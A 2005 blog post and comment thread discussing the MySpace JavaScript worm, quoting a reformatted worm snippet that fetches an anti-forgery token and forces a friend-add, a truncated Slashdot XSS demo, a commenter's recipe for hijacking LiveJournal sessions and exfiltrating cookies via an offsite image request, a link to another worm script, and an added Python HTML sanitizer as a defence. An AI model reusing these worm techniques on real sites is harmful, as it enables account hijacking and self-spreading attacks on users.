08:44 am, 13 Oct 05
myspace worm
MySpace worm using Javascript.
That post hypothesizes the problem is using GET instead of POST (both LJ and Orkut and many other apps did this), but it looks more complicated than that. Here's a reformatted snippet of the worm code, which looks like it GETs one page, retrieves a token from it, and then does the POST to actually make the change:
main(){
var AN=getClientFID();
var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
J=getXMLObj();
httpSend(BH,getHome,'GET');
xmlhttp2=getXMLObj();
httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}
function processxForm(){
if(xmlhttp2.readyState!=4){return}
var AU=xmlhttp2.responseText;
var AQ=getHiddenParameter(AU,'hashcode');
var AR=getFromURL(AU,'Mytoken');
var AS=new Array();
AS['hashcode']=AQ;
AS['friendID']='11851658';
AS['submit']='Add to Friends';
httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
}
-- Philipp, Google Blogoscoped
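The snippet above shows why the Mytoken/hashcode round-trip gave no protection: script running inside the site's own origin can fetch the token just like the user's browser would, so the defence has to be applied to the user-supplied HTML itself. As an added example (not code from this page, MySpace, or any of the commenters), here is a hypothetical whitelist sanitizer in Python for profile markup: it keeps only a handful of tags and attributes, and normalises attribute values before checking them, so the style-attribute url(javascript:...) vector mentioned further down the thread is dropped as well.

```python
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical whitelist for a profile page; anything not listed is dropped.
ALLOWED_TAGS = {"b", "i", "u", "p", "br", "div", "span", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src"}, "div": {"style"}, "span": {"style"}}
SAFE_SCHEMES = ("http://", "https://")


def attribute_is_safe(name, value):
    """Decide whether a whitelisted attribute may keep its value."""
    # Strip whitespace and control characters first: browsers of the era
    # happily ran "java\nscript:" as "javascript:", so the check must too.
    flat = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    if name in ("href", "src"):
        return flat.startswith(SAFE_SCHEMES)
    if name == "style":
        # Reject IE's expression() and any url() that is not a plain http(s) URL,
        # e.g. background-image:url(javascript:...).
        if "expression(" in flat:
            return False
        targets = re.findall(r"url\(['\"]?([^'\")]*)", flat)
        return all(t.startswith(SAFE_SCHEMES) for t in targets)
    return False


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities are decoded before checks
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # tag dropped; its text content still passes through escaped
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # onerror, onload and friends never get this far
            if attribute_is_safe(name, value):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is re-encoded, never echoed raw


def sanitize(html):
    """Return a sanitized copy of untrusted profile HTML."""
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)
```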
The default JS security model is to only allow it to access the properties of the site it's loaded from - http://www.mozilla.org/projects/security/c
Use Moz!!!
Avoid that nasty IE thing, it bites!
Re: Use Moz!!!
AJAX exploits
It's the new thing. If you can execute JS on a site, you can pretty much take over the entire browser. XMLHttpRequest can silently execute GET and POST requests with the server thinking it's just the user. And the user doesn't suspect a thing since it's all behind the scenes. For example, with LiveJournal, simply do a GET request to login.bml. Parse the login challenge authentication and other login variables. Do a POST to login.bml with this data, but make it so the session never expires and doesn't bind to the IP. Use getAllResponseHeaders to read the headers/cookie (so much for httpOnly cookies). Have JS load an offsite file (easily done with a new image src) with the cookie info added on. LJ account is now hijacked as long as the user doesn't hit log out. Of course, this only works if one hypothetically finds a way to get past cleanhtml.pl and let LJ display JS code.
Re: AJAX exploits
It's happened before. The fixes are normally made quietly without much fanfare to give the clone sites a chance to upgrade before they get got. Fortunately, I don't think there's much left that hasn't been scrutinised and escaped or cleaned like crazy.
Re: AJAX exploits
The most effective user-available countermeasure is whitelist-based JavaScript blocking: Firefox + NoScript (http://noscript.net).
Re: AJAX exploits
Re: AJAX exploits
(ducks)
-j
you're in the news even
All I'll say is this.....
One, you've been secondary /.'ed. Two, "When the bad guy can run code on your computer, it's not your computer anymore." You'd think they'd know that first you gotta assume that someone would have a compromisable browser and design web apps against it, and also some sanity checking of some sort. I mean, should _SOMETHING_ have killed this worm when it hit a few hundred users a sec, or hell, just tens of users a sec? I'd personally say that Myspace is just as responsible.
Re: All I'll say is this.....
Responsible for what? Allowing the worm to spread? Allowing security holes to exist? Sounds like they had no power over the situation. I figure it's pretty hard to notice something like that on a high-traffic site like MySpace; you see extra activity and you think "wow, busy day today", not "oh crap, a worm is eating my site". Thanks to Samy for alerting us all about this "undocumented feature", thanks to Evan for the code, pretty simple for something that did so much. I'm glad it was harmless; I'm sure Microsoft will come up with some token patch that "eliminates" (makes worse) this problem. :)
D
if/when this is going to be spread to Xanga (which doesn't filter JS at all).
Soon
If they are smart they probably already started tightening some security... so yes, the worm will probably be there soon too. ;-) (I hate xanga)
Re: Soon
However, unlike Myspace, I don't think there's any way to inject the javascript onto other users' pages (other than comments), so it wouldn't spread quite as easily.
I've written to Xanga about their huge vulnerabilities, but they've never done anything about it. Hopefully, the Myspace attack will make them a bit more aware and take some action.
xanga worm
A worm has been recently placed on xanga by a user called Davusiot.
Re: xanga worm
Not first :)
I did this in August 2005 in our local (Latvian) "myspace" which has like 430k+ users, though I didn't release it (it worked), because I don't want new roommates.
Here's the "worm": http://lethal.fabrika.lv/draugberts2.js You sent it in a message with a special tag (e.g. [div style="background-image:url(javascript:d
It is made very understandably, so even people who don't know very much about JS or programming can edit it and use it somewhere else.
hi
loldongs
Re: hi
patched on site spaces
This vulnerability was reported and patched on beerco's sitespaces.net. If anybody finds that it hasn't been sufficiently patched, please contact "tux" the linux penguin on the site and file a bug report.
using javascript
The title of this post is correct. Many sites are calling this a cross site scripting worm. The worm used javascript, yes, but is not XSS. XSS is when the client sends the payload to the server and the server echoes it back. This payload came from the server. I believe securityfocus and other sites refer to this as 'script injection'.
Thought I'd clear this up before more "security professionals" start giving quotes on how dangerous XSS is and just end up looking like fools.
other possibilities
Slashdot XSS Demo
The XSS hole in Slashdot (Slash: http://slashcode.com/) has since been closed but it serves as another demonstration of the same technique.
/********************************
/** http://www.zapthedingbat.com/
/********************************
var sUserAgent = navigator.userAgent.toLowerCase();
var isOpera = sUserAgent.indexOf("opera")!=-1;
var isIe = sUserAgent.indexOf("msie")!=-1&&(document.all&&!isOpera);
var isIe5 = sUserAgent.indexOf("msie 5")!=-1&&(document.all&&!isOpera);
function newRequest(){
  var oCtl = null;
  if (isIe){
    var aProgIds = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP');
    for (var i=0; i < aProgIds.length && (!oCtl); i++) {
      try{ oCtl = new ActiveXObject(aProgIds[i]); }catch(e){}
    }
  }else{
    oCtl = new XMLHttpRequest();
  }
  return oCtl;
}
function getFormKey(){
  var oRequest = newRequest();
  if (oRequest) {
    oRequest.open('GET', 'http://slashdot.org/journal.pl?op=edit', false);
    oRequest.setRequestHeader('Cookie', document.cookie);
    oRequest.setRequestHeader('Cookie', document.cookie);
    oRequest.setRequestHeader('User-Agent', 'Mozilla/4.0 (compatible; MSIE 6.0)');
    oRequest.setRequestHeader('Referer', 'http://slashdot.org/');
    oRequest.send(null);
    var sResponse = oRequest.responseText;
    try{ return sResponse.match(/
Re: Slashdot XSS Demo
nah
where to paste the html code in myspace?
where to paste the source code??
Re: where to paste the source code??
yaaa
i luvv u!!
Re: yaaa